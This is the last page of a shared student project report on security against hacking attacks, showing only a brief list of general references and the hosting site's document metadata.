            2.   Internet
            3.   IT Security and ethical hacking
            4.   YouTube
            5.   Google
            6.   Wikipedia




                                                   69

				
DOCUMENT INFO
Shared By:
Tags: Project, Report
Stats:
views:745
posted:5/4/2012
language:English
pages:69
Description: This Simple Project Report Based On Security For Hacking Attacks